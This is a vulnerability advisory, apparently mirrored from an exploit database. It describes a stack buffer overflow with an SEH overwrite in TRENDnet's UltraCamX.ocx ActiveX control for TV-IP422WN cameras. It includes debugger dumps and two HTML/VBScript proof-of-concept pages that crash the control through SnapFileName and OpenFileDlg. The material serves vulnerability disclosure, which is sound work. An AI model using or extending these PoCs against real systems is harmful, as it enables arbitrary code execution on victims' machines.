###########################

# TRENDnet SecurView Wireless Network Camera TV-IP422WN Stack BoF

###########################

TRENDnet SecurView Wireless Network Camera TV-IP422WN (UltraCamX.ocx) Stack BoF


Vendor: TRENDnet
Product web page: http://www.trendnet.com
Affected version: TV-IP422WN/TV-IP422W

Summary: SecurView Wireless N Day/Night Pan/Tilt Internet Camera, a powerful
dual-codec wireless network camera with the 2-way audio function that provides
the high-quality image and on-the-spot audio via the Internet connection.

Desc: The UltraCam ActiveX Control 'UltraCamX.ocx' suffers from a stack buffer
overflow vulnerability when parsing large amount of bytes to several functions
in UltraCamLib, resulting in memory corruption overwriting severeal registers
including the SEH. An attacker can gain access to the system of the affected
node and execute arbitrary code.

-----------------------------------------------------------------------------

0:000> r
eax=41414141 ebx=100ceff4 ecx=0042df38 edx=00487900 esi=00487a1c edi=0042e9fc
eip=100203fb esp=0042d720 ebp=0042e9a8 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210212
UltraCamX!DllUnregisterServer+0xeb2b:
100203fb 8b48e0 mov ecx,dword ptr [eax-20h] ds:002b:41414121=????????
0:000> !exchain
0042eda8: 41414141
Invalid exception stack at 41414141

-----------------------------------------------------------------------------


Tested on: Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2014-5211
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5211.php


16.11.2014

---


Properties:
-----------

FileDescription UltraCam ActiveX Control
FileVersion 1, 1, 52, 16
InternalName UltraCamX
OriginalFileName UltraCamX.ocx
ProductName UltraCam device ActiveX Control
ProductVersion 1, 1, 52, 16


List of members:
----------------

Interface IUltraCamX : IDispatch
Default Interface: True
Members : 62
RemoteHost
RemotePort
AccountCode
GetConfigValue
SetConfigValue
SetCGIAPNAME
Password
UserName
fChgImageSize
ImgWidth
ImgHeight
SnapFileName
AVIRecStart
SetImgScale
OpenFolder
OpenFileDlg
TriggerStatus
AVIRecStatus
Event_Frame
PlayVideo
SetAutoScale
Event_Signal
WavPlay
CGI_ParamGet
CGI_ParamSet
MulticastEnable
MulticastStatus
SetPTUserAllow


Vulnerable members of the class:
--------------------------------

CGI_ParamSet
OpenFileDlg
SnapFileName
Password
SetCGIAPNAME
AccountCode
RemoteHost


PoC(s):
-------

<html>
<object classid='clsid:E1B26101-23FB-4855-9171-F79F29CC7728' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraCamX.ocx"
prototype = "Property Let SnapFileName As String"
memberName = "SnapFileName"
progid = "UltraCamLib.UltraCamX"
argCount = 1

thricer=String(8212, "A")

target.SnapFileName = thricer

</script>
</html>

--

eax=41414141 ebx=00809590 ecx=41414141 edx=031e520f esi=0080c4d4 edi=00000009
eip=1002228c esp=003befb4 ebp=003befbc iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
UltraCamX!DllUnregisterServer+0x109bc:
1002228c 0fb64861 movzx ecx,byte ptr [eax+61h] ds:002b:414141a2=??

--


<html>
<object classid='clsid:E1B26101-23FB-4855-9171-F79F29CC7728' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraCamX.ocx"
prototype = "Function OpenFileDlg ( ByVal sFilter As String ) As String"
memberName = "OpenFileDlg"
progid = "UltraCamLib.UltraCamX"
argCount = 1

thricer=String(2068, "A")

target.OpenFileDlg thricer

</script>
</html>

--

0:000> r
eax=41414141 ebx=100ceff4 ecx=0042df38 edx=00487900 esi=00487a1c edi=0042e9fc
eip=100203fb esp=0042d720 ebp=0042e9a8 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210212
UltraCamX!DllUnregisterServer+0xeb2b:
100203fb 8b48e0 mov ecx,dword ptr [eax-20h] ds:002b:41414121=????????
0:000> !exchain
0042eda8: 41414141
Invalid exception stack at 41414141

--

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2014-11-26]

###########################